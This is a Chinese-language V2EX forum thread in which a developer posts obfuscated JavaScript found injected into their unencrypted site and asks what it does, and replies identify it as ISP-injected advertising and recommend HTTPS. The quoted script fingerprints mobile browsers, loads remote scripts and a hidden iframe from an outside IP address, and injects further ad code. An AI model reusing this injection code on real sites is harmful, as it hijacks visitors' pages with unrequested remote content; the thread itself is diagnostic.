这是被注入了个什么。。爬虫么。。?

2018-09-30 14:03:08 +08:00
 Deville

今天可怜的小测试反馈,外网地址偶尔会出现奇怪的代码,但刷新之后就没了,是偶现的。我看了下,只能看懂他貌似遍历了下 <script> 和 <div>,但还是没搞懂他的真正用途以及有什么危害,V 站大神帮忙讨论一下。具体代码如下(没做个前端,看不懂 js。。但按照习惯理了理格式。。):</p> <pre><code>( function(){ function h() { return /(Android|iPhone|iPad|iPod)/ i.test(navigator.userAgent)? !0 : !1 } function k(a) { var c=document.createElement("script");c.type="text/javascript";c.src=a;document.getElementsByTagName("head")[0].insertBefore(c,null) } for(var b=document.getElementsByTagName("script"),n=/http:\/\/[a-z0-9.]*:10028\/js\/commo[\S]*.js/,e={},g=0; g<b.length; g++) if(n.test(b[g].src)) { b[g].src.split("?")[1].split("&").forEach(function(a,c){a=a.split("=");e[a[0]]=a[1]}); break } randNum2=parseInt(100*Math.random()); randNum3=parseInt(100*Math.random()); !0===h()&&(65<=randNum3&&k("http://47.100.7.38:10028/js/mccc-tc.d.en.js?hash=bd&id="+e.a),28>=randNum3&&k("http://47.100.7.38:10028/js/mccc-tc.d.s.en.js?hash=bd&id="+e.a+"_st")); 50>randNum2&&!0===h()&&(b=document.createElement("div"),b.style.display="none",b.style.width="0px",b.style.height="0px",document.body.appendChild(b),b.innerHTML='<iframe src="http://47.100.7.38:10028/js/24h-hven-zz-all-new.html?a='+e.a+'"></iframe>'); var l=0, m=setInterval( function() { 30==l&&clearInterval(m); for(var a=document.getElementsByTagName("div"),c=/^http:\/\/[\S]+(yiqisee.cn|vveizi.com|xunworld.cn)\/([\w]+[_]?[\w]*\/?)+[\S]+/,d=0;d<a.length;d++) if(!0===h()) { if(a[d].style.position||"fixed"==a[d].style.position) { var b="fixed"==a[d].style.position?!0:!1; var e=999<=a[d].style.zIndex?!0:!1; var f="0px"==a[d].style.bottom?!0:0>=a[d].style.bottom?!0:!1 } else f=window.getComputedStyle(a[d]), b="fixed"==f.position?!0:!1, e=999<=f.zIndex?!0:!1, f=0>=parseInt(f.bottom)?!0:!1; if(0<a[d].getElementsByTagName("iframe").length && !0===c.test(a[d].getElementsByTagName("iframe")[0].src)) return; if(b&&e&&f) { a=logjs+"?f=ad"; c=document.createElement("script"); c.type="text/javascript"; c.async=!0; c.src=a; document.getElementsByTagName("head")[0].insertBefore(c,null); clearInterval(m); return } } l++ },300) } </code></pre> <p>)();</p> </script>

3792 次点击
所在节点    JavaScript
11 条回复
yunye
2018-09-30 14:06:24 +08:00
运营商注入的广告吧
Telegram
2018-09-30 14:07:46 +08:00
同一楼
Deville
2018-09-30 14:09:16 +08:00
@yunye 奥奥奥,针对运营商的劫持是不是
yunye
2018-09-30 14:14:42 +08:00
@Deville 运营商看你们这也没用 https,就好心帮你们放点广告什么的,他自己赚点小钱
locoz
2018-09-30 14:22:12 +08:00
看起来只是广告
Deville
2018-09-30 14:22:59 +08:00
@yunye 47.100.7.38:10028 这个 IP 不是我们的,,,(虽然我们确实没上 https。。
但我还是很好奇那两个 for 循环 以及 那个正则干了什么事儿。。
drydiy
2018-09-30 14:32:33 +08:00
关键词 iframe
应该是内嵌广告了。
Deville
2018-09-30 14:35:11 +08:00
@drydiy 但为啥没显示出来呢。。而是首次访问会显示这段代码,刷新后正常显示网页内容
opengps
2018-09-30 14:44:46 +08:00
就是运营商注入的广告,以前用长宽时候,本地访问我网站,都能给我加上广告,解决办法是上 https,让传输过程变成密文
miyuki
2018-09-30 15:02:17 +08:00
@Deville

不是 针对运营商的劫持
是 运营商针对你的劫持
。。
Deville
2018-09-30 15:40:15 +08:00
@miyuki 啊。。嘻嘻嘻。。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/494153

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX